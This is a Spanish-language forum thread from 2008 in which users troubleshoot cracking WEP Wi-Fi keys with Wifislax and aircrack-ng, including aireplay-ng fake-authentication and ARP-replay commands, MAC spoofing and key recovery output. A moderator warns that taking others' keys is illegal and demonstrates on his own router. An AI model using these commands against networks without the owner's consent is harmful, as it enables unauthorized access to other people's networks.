Seguridad Wireless - Wifi

Suite Seguridad Wireless => Entornos Virtuales => Mensaje iniciado por: M_aqui en 07-03-2008, 07:30 (Viernes)

Título: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 07-03-2008, 07:30 (Viernes)
Buenas...
drvalium he seguido paso a paso las instrucciones que vienen en la pagina https://foro.seguridadwireless.net/index.php/topic,4528.0.html pero en el paso 5 aplicando la asosiacion me sale este error...

"The interface MAC (00:00:00:00:00:00) doesn't the especified MAC (-h)"

que estoy haciendo mal  :'(

intente subier una imagen para que vieras exactamente que es lo que me pasa, pero no pude, si me pudieras decir como subo una para que la veas.... Nuevamente muchas GRACIAS   ???
Título: Re: manual WifiSlax sobre Windows Vista - PDF
Publicado por: drvalium en 07-03-2008, 21:16 (Viernes)
Buenas

Cita de: M_aqui
"The interface MAC (00:00:00:00:00:00) doesn't the especified MAC (-h)"

Usa el codigo asi:

aireplay-ng -1 30 -e ESSID -a BSSID -h 11:22:33:44:55:66 wlan0

ESSID= nombre de la red a la que te quieres asociar.

BSSID= direccion MAC router de la red a la que te quieres asociar.

este ataque solo funciona si no hay cliente asociado.

Si hay cliente utiliza directamente el ataque 3.

aireplay-ng -3 -b BSSID -h STATION

BSSID= direccion MAC router de la red  que quieres monitorizar.

STATION: direccion MAC del cliente asociado.


Mira esto: Como saber si hay cliente asociado (https://foro.seguridadwireless.net/index.php/topic,9749.msg56913.html#msg56913)

Y para las subir las capturas esto: Manual subir fotos con Picasa (https://foro.seguridadwireless.net/index.php/topic,9913.0.html)

saludos

Título: Re: manual WifiSlax sobre Windows Vista - PDF
Publicado por: M_aqui en 08-03-2008, 02:46 (Sábado)
Buenas...
Drvalium, segui al pie de la letra tu ultimo comentario, y lo unico que me faltaba era cambiar mi mac, pero investigando un poco logre hacerlo y despues de cambiarla, logre la asociacion sin ninugn problema y tambien logre que inyectara, bueno eso entre comillas, por eso mi nueva duda...
me aparece exactamente lo mismo que viene en la foto que esta en la pagina https://foro.seguridadwireless.net/index.php/topic,4528.0.html en el paso 6 empezando a inyectar paquetes pero miro la otra shell y nada, en la columa de "DATA" no hay un cambio, sigue normal como si no inyectara, dime que hago porfavor...

Me di cuenta de que por ejemplo en Backtrack 2 para poder inyectar y exprimirle jugo a la ALFA NETWORK hay que parchar el driver y el aircrack, no se si aqui lo tenga que hacer, espero me vuevas a ayudar... Gracias
Título: Re: manual WifiSlax sobre Windows Vista - PDF
Publicado por: drvalium en 08-03-2008, 02:53 (Sábado)
buenas

con asociación falsa, puede llegar a tardar mucho rato en empezar a inyectar, ten paciencia.

saludos
Título: Re: manual WifiSlax sobre Windows Vista - PDF
Publicado por: M_aqui en 08-03-2008, 06:36 (Sábado)
Buenas...
Cuando hago la asociacion y dejo la shell abierta despues de un rato me sale esto...
Attack was unsuccessful. Possible reasons:

wifislax ~ # aireplay-ng -1 30 -e 2WIRE654 -a 00:14:95:D9:78:21 -h 11:22:33:44:55:66 wlan0
06:28:15  Waiting for beacon frame (BSSID: 00:14:95:D9:78:21)
06:28:15  Sending Authentication Request
06:28:15  Authentication successful
06:28:15  Sending Association Request
06:28:15  Association successful :-)

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).

Eso es normal o ocurrio un error?? o despues de que autentifica devo cerrar la shell???

cuando logro inyectar con una asociacion falsa cuanto es mucho rato?? no es porque sea desesperad, pero quiero darme una idea de lo que tenria que esperar para ver los resultados deseados... Gracias
Título: Re: manual WifiSlax sobre Windows Vista - PDF
Publicado por: M_aqui en 08-03-2008, 07:52 (Sábado)
Si quiero ir directamente al ataque 3 tengo primero que hacer la asociacion?? o voy directamente sin hacer la asociacion, lo he intentado de las dos formas y no puedo, me dice que no esta asociado... mas ayuda porfavor... Gracias
Título: Re: manual WifiSlax sobre Windows Vista - PDF
Publicado por: ChimoC en 08-03-2008, 10:57 (Sábado)
Buenas:

Este es un manual para instalación.... por favor para ataques y asociaciones y cosas por el estilo.... abre un nuevo post  ;)

Un saludo

ChimoC
Título: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 08-03-2008, 15:40 (Sábado)
Buenas...
Espero que en este tema contemos con los conocimientos de Drvalium, ChimoC y todos los que quieran aportar algo positivo para las personas que batallmos con linux...
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 08-03-2008, 16:39 (Sábado)
Buenas...
drvalium como te decia en el otro post, lo vuelvo a poner aqui...
1.- Me pongo en modo monitor asi airmon-ng start wlan0 X   "X el numero del canal deseado"
2.- Checo que la tarjeta este en modo monito y en el canal deseado de esta forma iwconfig wlan0
3.- Corro el airodump asi airodump-ng -w aaaa -cX wlan0  "X el numero del canal deseado"
4.- Si no hay un cliente asociado hago esto:
     4.1.- aireplay-ng -1 30 -e ESSID -a BSSID -h 00:11:22:33:44:55 wlan0  y aqui empiezan mis dudas segun yo logro la asociacion porque me sale esto:

wifislax ~ # aireplay-ng -1 30 -e "NOMBRE BSSID" -a "MAC DE QUIEN NOS QUEREMOS ASOCIAR" -h 00:11:22:33:44:55 wlan0
16:00:05  Waiting for beacon frame (BSSID: 00:14:95:XX:XX:XX)
16:00:05  Sending Authentication Request
16:00:05  Authentication successful
16:00:05  Sending Association Request
16:00:05  Association successful :-)

pero dejo la shell abierta que no se si sea lo correcto y despues de un rato me sale esto:

16:02:51  Sending keep-alive packet
16:03:06  Sending Authentication Request
16:03:06  Authentication successful
16:03:06  Sending Association Request
16:03:11  Sending Authentication Request
16:03:11  Authentication successful
16:03:11  Sending Association Request
16:03:16  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).

es normal o deveria cerrar la shell desde que me dice que ya autentifico??

5.- Antes de que me salga la leyenda "Attack was unsuccessful. Possible reasons:" y todo lo demas que ya comente, Trato de Inyectar de esta forma
aireplay-ng -3 -x600 -b "MAC DE QUIEN NOS QUEREMOS ASOCIAR" -h 00:11:22:33:44:55 wlan0
y me sale esto:
Saving ARP requests in replay_arp-0308-160204.cap
You should also start airodump-ng to capture replies.
Read 292649 packets (got 3307 ARP requests), sent 668552 packets...(511 pps)

Pero no veo ningun cambio significativo, SI ESTOY INYECTANDO BIEN?? o no estoy inyectando??
me dice drvalium en un post anterior que como es asociacion falsa tarda mucho en inyectar, Cuanto es mucho?? media hora una hora o mas y lo pregunto no por desesperado sino para saber si estoy haciendo bien las cosas...

6.- Si hay un cliente asociado hago esto tal cual drvalim me lo habia dicho:
aireplay-ng -3 -b "MAC DEL ROUTER" -h "MAC DEL CLIENTE ASOCIADO"

pero me topo con otro problema que es este:

wifislax ~ # aireplay-ng -3 -b "MAC DEL ROUTER" -h "MAC DEL CLIENTE ASOCIADO"
No replay interface specified.
"aireplay-ng --help" for help.

y hasta aqui llego con un cliente asociado...
Espero no sea mucho pedir de mi parte y me puedan ayudar... de nuevo GRACIAS
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 08-03-2008, 23:56 (Sábado)
buenas

Citar
es normal o deveria cerrar la shell desde que me dice que ya autentifico??

es normal

Citar
5.- Antes de que me salga la leyenda "Attack was unsuccessful. Possible reasons:" y todo lo demas que ya comente, Trato de Inyectar de esta forma
aireplay-ng -3 -x600 -b "MAC DE QUIEN NOS QUEREMOS ASOCIAR" -h 00:11:22:33:44:55 wlan0
y me sale esto:
Saving ARP requests in replay_arp-0308-160204.cap
You should also start airodump-ng to capture replies.
Read 292649 packets (got 3307 ARP requests), sent 668552 packets...(511 pps)

Pero no veo ningun cambio significativo, SI ESTOY INYECTANDO BIEN?? o no estoy inyectando??

esto te dice que a estas inyectando got 3307 ARP requests y deberías notar que los DATA suben mas deprisa.

Citar
me dice drvalium en un post anterior que como es asociacion falsa tarda mucho en inyectar, Cuanto es mucho?? media hora una hora o mas y lo pregunto no por desesperado sino para saber si estoy haciendo bien las cosas...

en verdad dije
buenas

con asociación falsa, puede llegar a tardar mucho rato en empezar a inyectar, ten paciencia.

saludos

pero también puede ser casi instantáneo.

Cita de: M-aqui
6.- Si hay un cliente asociado hago esto tal cual drvalim me lo habia dicho:
aireplay-ng -3 -b "MAC DEL ROUTER" -h "MAC DEL CLIENTE ASOCIADO"

pero me topo con otro problema que es este:

wifislax ~ # aireplay-ng -3 -b "MAC DEL ROUTER" -h "MAC DEL CLIENTE ASOCIADO"
No replay interface specified.
"aireplay-ng --help" for help.

Perdón el error a sido mio el comando correcto es:

aireplay-ng -3 -b BSSID -h STATION wlan0

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 09-03-2008, 18:40 (Domingo)
Buenas...
drvalium antes de seguir con mis dudas dejame darte las gracias, todos tus comentarios me han servido de mucho...

Como te dije en un post anterior cuando tengo un cliente y quiero ir directamente al ataque 3 no puedo, te describo paso a paso lo que hago y espero me puedas ayudar nuevamente...

1.- Corro el airmon-ng y me pongo en el canal deseado asi, airmon-ng start wlan0 "X"  ("X" canal deseado)
2.- Checo la tarjeta que este en modo monitor y en el canal deseado asi, iwconfig wlan0
3.- Corro el airodump-ng en el canal deseado asi, airdump-ng -w nombre del archivo -cX wlan0
4.- Aqui si no hubiera un cliente, haria la asociacion, pero como si tengo cliente NO HAGO ESTE PASO y me voy directame al ataque 3 y lo hago de esta forma, aireplay-ng -3 -b BSSID DEL CLIENTE -h MAC DEL CLIENTE wlan0

y es aqui donde ya no puedo avanzar despues de poner el comando anterior me sale esto:

wifislax ~ # aireplay-ng -3 -b 00:1A:C4:57:11:89 -h 00:12:F0:B6:0C:47 wlan0
The interface MAC (11:22:33:44:55:66) doesn't match the specified MAC (-h).
ifconfig wlan0 hw ether 00:12:F0:B6:0C:47
Saving ARP requests in replay_arp-0309-112003.cap
You should also start airodump-ng to capture replies.
11:20:19  Packets per second adjusted to 375 894 packets...(74 pps)

a mi poco entender lo que esta en rojo esta mal y por eso no puedo inyectar cuando tengo un cliente...
Que hago, que estoy haciendo mal??  :-\
Gracias
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 09-03-2008, 19:06 (Domingo)
Buenas

Citar
The interface MAC (11:22:33:44:55:66) doesn't match the specified MAC (-h).

esa linea te dice que tu adaptador tiene configurado como MAC 11:22:33:44:55:66 y que no es la correcta, pero la siguiente

Citar
ifconfig wlan0 hw ether 00:12:F0:B6:0C:47

te informa de que la ha cambiado por la que corresponde.


Ambas lineas son normales, no te preocupes.

Ahora no puedo (estoy viendo las motos ;)),

para mañana te pondré unas bonitas fotos.

ya te lo he dicho, ten paciencia, si fuese tan fácil no existirían foros como este. ;)

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 09-03-2008, 19:40 (Domingo)
Buenas...
Entonces todo esta bien?? solamente hay que esperar o tengo que ponerle en el comando
aireplay-ng -3 -b BSSID DEL CLIENTE -h MI MAC FALSA wlan0
o
aireplay-ng -3 -b MAC DEL CLIENTE -h MI MAC FALSA wlan0
o
como tu me has dicho que seria de esta forma

aireplay-ng -3 -b BSSID DEL CLIENTE -h MAC DEL CLIENTE wlan0
y aunque salga el error que te comente anteriormente esta bien y solo hay que esperar???
Gracias por ayudarme
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 09-03-2008, 19:49 (Domingo)
buenas

Citar
seria de esta forma

aireplay-ng -3 -b BSSID DEL CLIENTE -h MAC DEL CLIENTE wlan0
y aunque salga el error que te comente anteriormente esta bien y solo hay que esperar???
Gracias por ayudarme

exacto solo hay que esperar.

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 10-03-2008, 06:28 (Lunes)
Buenas...
Primero que nada gracias por todo el apoyo...
Les cuento que ya he obtenido resultados, he logrado desifrar una clave, lo hice mediante asociacion, tardo un poco mas de una hora y obtuve resultados...
He intentado hacerlo cuado hay un cliente y no he podido, he seguido todos los consejos de drvalium y he tenido pasciencia y nada, en mi ultimo intento con un cliente asociado tardo mas de 3 horas sin conseguir ningun resultado, de todas formas creo que para un novato como yo, el obtener la clave de una u otra forma creo que es bueno y seguire intentando para obtener los resultados deseado como lograr obtener una clave con cliente asociado y en poco tiempo... Espero seguir contando con su apoyo
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 12-03-2008, 00:49 (Miércoles)
Buenas...
Drvalium como ya lo comente en post anterior, he conseguido resultados positivo, aunque sigo teniendo dudas acerca de la inyeccion, he tenido pasciecia como tu me lo has recomendado he llegado a estar esperando casi 10 horas y nada, pero ayer he conseguido resultados en aproximadamente 16 minutos que es lo que creo que todos buscamos "que sea rapido" mi pregunta es porque tanta diferencia en tiempo?? a que se deve?? estoy usando una ALFA NETWORK y he leido en algunas paginas que para usar esta tarjeta y obtener resultados rapidos por ejemplo en backtrack hay que parchar algunos archivo te dejo la pagina para que le heches un ojo  :o...
http://aircrack-ng.org/doku.php?id=r8187
En wifislax 3.1 hay que hacer algo similar??
espero no aburrirte con este tema y como siempre Gracias por todo el apoyo
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 13-03-2008, 00:31 (Jueves)
Buenas

- Por supuesto que no me aburres, me martirizas ;D ;D ;D ;D ;D

Citar
mi pregunta es porque tanta diferencia en tiempo?? a que se deve??

- la verdad es que no tengo ni idea.

- Sin cliente asociado (ataques 1+3), digamos que no es una ciencia exacta, si usas el buscador del foro verás que se ha escrito mucho sobre el tema.

- Con cliente asociado (ataque 3) mas o menos siempre se tarda lo mismo, entre 3 y 20 minutos, depende de la velocidad con la que inyectes los paquetes y la velocidad de inyección depende entre otras cosas de la calidad de la señal. Prueba a cambiar la transmisión de datos (rate) del adaptador.

Código: [Seleccionar]
iwconfig wlan0 rate 1Mhe puesto un mega pero puedes poner dos, tres, cinco, lo que quieras.

- También depende mucho del trafico que hay en la red, se captura mucho mas rápido de una red que esta usando el emule que de una red que están mirando el correo.

- Estoy tardando en contestarte por que tengo mi Bosslan prestada y hasta el viernes no la recupero, así que la tenga probaré los nuevos drivers y podre contestarte en condiciones.

- Para actualizar los drivers no es necesario que te vallas del foro, aquí y por cortesía de Hwagm los tienes instrucciones incluidas.

  Drivers rtl8187_linux_26.1010 (https://foro.seguridadwireless.net/index.php/topic,9876.msg0.html#new)

- Como para actualizarlos necesitas conexión a internet en WifiSlax, quizá esto te interese.

  Compartir la conexión a Internet entre Windows y VMware (https://foro.seguridadwireless.net/index.php/topic,10265.0.html)

- También me acuerdo que te dije que te pondría unas capturas del proceso, cuando recupere la Bosslan cumpliré mi palabra. ;)

- De momento ya te digo que estoy sin Bosslan, así que te pido un poco de paciencia.


saludos


PD: "aburreme" siempre que quieras ;)





Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 14-03-2008, 03:20 (Viernes)
Buenas...
Drvalium haciedo mas pruebas me he topado con otra duda...
hoy quise obtener una clave de una red que tiene por ESSID -=( XXXXXXX )=- y el problema viene cuando me quiero autentificar porque no hay cliente y me sale este error

Waiting for beacon frame (BSSID: 00:00:00:00:00:00)
Sending Authentication Request
Authentication successful
Sending Association Request
Denied (code 12), wrong ESSID or WPA?

Creo que no esta asociando sin embargo trato de inyectar ya que en el otro shell me pone en AUT  OPN que eso siempre sale cuando te logras asociar...  y al tratar de inyectar me dice esto...

aireplay-ng -1 30 -e -=( XXXXXXX )=- -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 wlan0
bash: syntax error near unexpected token '('

creo que no me puedo autentificar por el parentesis pero como le haria si asi es el nombre del ESSID??
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 14-03-2008, 03:26 (Viernes)
Se me olvidava...
Espero que publiques las fotos, y tambien espero que cheques los nuevos drivers y me digas si es necesario que en wifislax sean parchados o ya con los que trae la version 3.1 es suficiente...
Gracias
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 14-03-2008, 03:42 (Viernes)
Buenas

te recuerdo que la obtención de claves ajenas es un delito y en el foro no damos apoyo ha ese tipo de actividades. Ademas publicar datos ajenos creo que también es un delito.

he editado tu post para anular esos datos, por favor vigila que preguntas o me veré obligado a borrarlos.

De obligada lectura (https://foro.seguridadwireless.net/index.php/topic,6093.0.html)

reconfigura tu Router poniéndole el mismo ESSID que te da problemas y podré contestarte.

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 14-03-2008, 03:49 (Viernes)
buenas de nuevo

mañana recupero mi Bosslan, a lo largo del sábado ( a menos que me llamen del trabajo) te colgare las capturas, yo tiro con la Bosslan con los drivers  que vienen en WifiSlax y funcionan perfectos, de todas formas probare los nuevos y te cuento.

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 16-03-2008, 04:40 (Domingo)
buenas

Se me olvidava...
Espero que publiques las fotos, y tambien espero que cheques los nuevos drivers y me digas si es necesario que en wifislax sean parchados o ya con los que trae la version 3.1 es suficiente...
Gracias

- Ya he chequeado los nuevos drivers y funcionan bien,  no he notado diferencias significativas con los viejos, así que la decisión es tuya. Yo personalmente creo que al menos deberías probarlos.

- Las capturas están tomadas con los drivers nuevos instalados.

Como se a quien quiero atacar (a mi), iré directamente al grano.

1º- Activo el modo monitor en el canal 9.
Código: [Seleccionar]
airmon-ng start wlan0 9
2º- Inicio airodump-ng para que solo monitorice el canal 9 y añado un filtro para monitorizar solo mi router.
Código: [Seleccionar]
airodump-ng -w datos -c 1 --bssid 00:60:XX:XX:XX:59 wlan0
3º- Espero a que se asocie.

(http://farm4.static.flickr.com/3062/2335905697_b7754de7d9_o.png) (http://www.flickr.com/photos/23989035@N07/2335905697/)

4º- Inicio aireplay-ng y espero.
Código: [Seleccionar]
aireplay-ng -3 -b 00:60:XX:XX:XX:59  -h 00:14:XX:XX:XX:F0 rausb0
(http://farm3.static.flickr.com/2379/2336767564_a1dc099041_o.png) (http://www.flickr.com/photos/23989035@N07/2336767564/)

5º- Después de 21 minutos y 100.445 datas ya podemos obtener la clave.

(http://farm3.static.flickr.com/2148/2335825753_9b1a54ca19_o.png) (http://www.flickr.com/photos/23989035@N07/2335825753/)

En el momento de hacer la captura la velocidad de inyección ha caído debido a falta de recursos del PC (también estaba haciendo cosas con el windows y el pobrecito Pc no ha podido con todo), pero aunque no es para tirar cohetes ha estado inyectando entre 140 y 180 paquetes por segundo.

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 16-03-2008, 19:59 (Domingo)
Buenas...
Primero que nada una disculpa por publicar asi los datos fue un error mio que no volvera a pasar, y al igual que ustedes estoy en desacuerdo en la obtencion de claves sin el consentimiento del dueño, esa clave es de un primo mio, y solo queria demostrarle que su clave no esta del todo segura como el lo decia, aclarados esos puntos y reiterando la disculpa por la publicacion de esos datos, quisiera drvalium me ayudaras a saber porque cuando el nombre de la red como en este caso viene con signos y parentesis no puedo autentificar me dices esto:
reconfigura tu Router poniéndole el mismo ESSID que te da problemas y podré contestarte
pero no se a que te refieres.... Espero seguir contando con tus consejos y Gracias por las fotos y por decirme como funcionan los drivers que comentamos, los estare probando en estos dias...
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 17-03-2008, 21:07 (Lunes)
buenas

Cita de: M_aqui
drvalium me ayudaras a saber porque cuando el nombre de la red como en este caso viene con signos y parentesis no puedo autentificar me dices esto:
reconfigura tu Router poniéndole el mismo ESSID que te da problemas y podré contestarte

- Como te he dicho a atacar redes ajenas de la que no tienes consentimiento (ya me ha quedado claro que no es tu caso) no te puedo ayudar, por eso te decía que reconfigurases tu router. Intento explicarme mejor con un ejemplo: para poder ayudarte he reconfigurado mi router y ahora el nombre de mi red (ESSID) es -=( drvalium )=-, ahora ya tengo el mismo problema que tu y puedo investigar sin molestar a nadie ni infringir la ley.

- Como te he dicho ahora tengo el mismo problema que tu, cuando inicio aireplay-ng obtengo este mensaje:

aireplay-ng -1 30 -e -=( drvalium )=- -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 wlan0
bash: syntax error near unexpected token '('

- La verdad es que ahora mismo no tengo ni idea de como se soluciona, pero estoy en ello, en cuanto encuentre la solución te lo comunico.

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 17-03-2008, 23:30 (Lunes)
Buenas...
Gracias por el apoyo, y al igual que tu estoy intentado ver como poder hacer la autentificacion y buscando respuestas...  ;D

Drvalium una clave WPA tambien es desifrable?? si es asi cuantos ivs necesito??
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 17-03-2008, 23:46 (Lunes)
buenas

- Las claves WPA creo que no se consiguen capturando paquetes, se utilizan diccionarios, sobre ellas hay mucho escrito en el foro, usa el buscador y encontraras todo lo necesario para intentarlo, pero creo que puede llegar a ser "imposible".

- Yo todavía no me he puesto ni a mirarme el tema por encima, así que no te puedo ayudar.

- Aun tengo que aprender bastante sobre las WEP, los ataques 2, 4 y 5 todavía no los domino y según parece el 1 y el 3 tampoco (esto de los símbolos me ha "pillao" en bragas). Cuando controle todos los ataques a las claves WEP daré el salto a las WAP.

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 18-03-2008, 00:02 (Martes)
buenas

M_aqui mírate esto: Tutorial: Como Auditar WPA/WPA2 (https://foro.seguridadwireless.net/index.php/topic,7721.0.html)

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 18-03-2008, 21:33 (Martes)
Buenas

Ya esta solucionado lo del ESSID (la verdad es que abrí un tema nuevo en el foro  ^-^).

Parece ser que el problema no es el símbolo ( si no los espacios, la forma de solucionarlo seria poniendo el ESSID entre comillas, quedaría así:

aireplay-ng -1 30 -e "-=( drvalium )=-" -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 wlan0

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 18-03-2008, 22:47 (Martes)
Buenas...
Gracias por el consejo y el link de las claves WPA, y no se diga por haber resuelto la incognita del Simbolo ( es usted un maestro....  :-'  :-'
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 18-03-2008, 22:57 (Martes)
buenas

Citar
y no se diga por haber resuelto la incognita del Simbolo ( es usted un maestro

Muchas gracias, pero solo soy un aprendiz, el maestro esta vez a sido chinitiw.

https://foro.seguridadwireless.net/index.php/topic,10478.0.html

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 20-03-2008, 01:34 (Jueves)
Buenas...
Honor a quien honor merece... Gracias tambien a chinitiw....  :-' por el apoyo
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 26-03-2008, 03:17 (Miércoles)
Buenas...
Drvalium, antes de cambiar la trasmision de datos como me lo recomendaste....

Prueba a cambiar la transmisión de datos (rate) del adaptador.
Código: [Seleccionar]
iwconfig wlan0 rate 1Mhe puesto un mega pero puedes poner dos, tres, cinco, lo que quieras.

cheque mi tarjeta y de fabrica venia en 11 megas... cuantos me recomiendas que le ponga
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 26-03-2008, 03:28 (Miércoles)
buenas

la velocidad de transmisión correcta varia según la calidad de la señal del punto de acceso al que quieres monitorizar y/o inyectar

¿tu adaptador es una Bosslan o una Alfa?

Yo la pongo siempre a 54Mb y si falla le voy bajando el rate por este orden hasta que funciona: 48, 36, 24, 12, 5, 1

como te digo no hay un rate mejor o peor, la norma estándar digamos que es a peor señal menos rate.

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 26-03-2008, 04:15 (Miércoles)
Buenas...
es una ALFA...
haber si te enendi... si la calidad de la señal es muy buena entonces la uso en 54 megas y si no es tan buena hay que irla bajando  ???
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 26-03-2008, 04:22 (Miércoles)
eso mismo
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 27-03-2008, 05:56 (Jueves)
Buenas...
Drvalium cuando hay cliente asociado tengo que aplicar tambien la asociacion?? y despues poner este comando
aireplay-ng -3 -b BSSID -h STATION wlan0

o no es necesario aplicar la asociacion e irme directamente al comando anterior  ???
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 27-03-2008, 12:16 (Jueves)
buenas

si hay cliente conectado no es necesaria la autentificación, con el comando que has puesto ya funciona la inyección.

saludos
Título: caray pues muchas gracias por todo
Publicado por: lapistinta en 27-03-2008, 17:46 (Jueves)
muchas gracias a quien inicio esto de la emulacion y sigue los problemas como suyos de los demás usuarios.

Pero aqui viene mi duda jejeje

Yo he emulado el wifislax 3.1 full

No instalo nada en el disco duro virtual lo he corrido solo desde el cd

me detecta bien mi tarjeta USB que es una ASUS wl-167g

Pues bien Mi problema es que la captura de datos va muuyyyyyy lenta

en 1 hora de captura apenas si lleva 10000 #Data, y cuando le corro el aircrack tarda media hora o mas con esos datos y termina diciendo se necesitan mas datos.

Que estoy haciendo mal? yo de linux no se nada solo me guié por otros post donde decian como sacar los datos de otras arjetas y lo que hago es lo siguiente a ver si me pueden ayudar a ver porque esta tan lento eso, por cierto a la memoria virtual le doy 650MB RAM de los cueles llega poco mas de 500 usados
 lo que hago es:

CONSOLA1:
ifconfig rausb0 up
airodump-ng rausb0
Ctrl+C
airodump-ng -c CHANNEL -w FILE rausb0

CONSOLA2:
aireplay-ng -1 10 -a BSSID -e ESSID -h EUREMAC rausb0

CONSOLA3:
aireplay-ng -3 -b BSSD -e ESSID -h EUREMAC rausb0

CONSOLA4: aircrack-ptw FILE-01.cap

Logicamente sustiuyo lo de CHANNEL,  BSSID, ESSID, eUREMAC Y FILE, por mis datos propios.

Listo en resuen eso hago y si aparentemente todo lo hace bien pero tarda una eternidad en capturar #Data.

en la consola 3 donde dice -3, he cambiado a -2, -4, -5 que me imagino es las distintas formas de inyección, (insisto de linux y sus comandos no se nada), y tampoco logro se acelere la captura de datos, alguien me puede decir que hago mal.

Gracias a todos por su tiempo y saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 27-03-2008, 19:14 (Jueves)
buenas

lapistinta

como puedes ver te he movido el mensaje de sitio, tu problema no tiene que ver con la emulación si no con Ataques y asociaciones, antes de abrir temas nuevos os tendríais que acostumbrar a leer un poco e intentar encontrar el sitio apropiado a vuestras dudas.

si te lees este tema seguramente encontraras solución a tu problema, si no es así, gustosamente contestare tus dudas.

Citar
en la consola 3 donde dice -3, he cambiado a -2, -4, -5 que me imagino es las distintas formas de inyección

con los números que cambias lo que haces es cambiar el tipo de ataque y no de forma de inyectar.

un saludo

PD:recordar que leer es bueno, muy bueno ;)
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: lapistinta en 27-03-2008, 22:51 (Jueves)
mil disculpas y cierto es que no he leido lo suficiente, gracias no me habia fijado habia este otro subforo, leeré y veré que pasa gracias y saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 28-03-2008, 00:14 (Viernes)
buenas

lapistinta

nada que disculpar  ;).

veo que es tu segundo post, Bienvenido al foro :D

no desesperes ni no sale a la primera, hasta cuando ya se sabe un poco no siempre sale a la primera.

si después de leer este tema no consigues inyectar, no te cortes en preguntar  ;)

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: lapistinta en 31-03-2008, 18:53 (Lunes)
listo señores después de 2 dias de estarle probando, con mi tarjeta USB al fin logré el objetivo a una velocidad aceptable de captura de datos.

Mi tarjeta: ASUS WL-167G
con chip rt73

les dejo un video de como se logró y en el tiempo que se hizo, lo probé desde el vmware en windows vista, y luego arranqué el wifi slax 3.1 version full y tambien funcionó. Saludos y si se pudo y bien, ya probaré luego como trabaja mi router con encriptación WPa y les platicaré.

a por cierto de preferencia mejor bajen el video porque en linea no se entienden los textos son solo 25 MB

http://files.filefront.com/WIFISLAXwmv/;9922116;/fileinfo.html
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 31-03-2008, 19:16 (Lunes)
buenas

felicidades por el éxito.

ahora que ya sabes que funciona te recomiendo que pases de airoscript y uses los comandos, veras como los resultados son mejores.

saludos
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: M_aqui en 01-04-2008, 03:34 (Martes)
Buenas...
Felicidades Lapistinta, no he bajado tu video pero ahorita lo hago...   :-'  :-'

Drvalium como ya sabes tengo una Alfa network y trae su antena normal si no me equivoco es de 2dbi y estoy pensando en ponerle una de 8dbi  8) es recomendable, tu que opinas  ???
Título: Re: Ataques y Asociaciones con Wifislax 3.1
Publicado por: drvalium en 01-04-2008, 19:00 (Martes)
OffTopic

buenas

para mi cualquier cosa que me haga ganar potencia siempre es recomendable  ;D

la verdad es que mucha diferencia no notaras, si solo quieres ganar 6dbi no te gastes dinero, en la zona de antenas caseras encontraras cosas que te dan mas potencia por mucho menos dinero, ademas es mas divertido hacerse las antenas uno mismo.

saludos

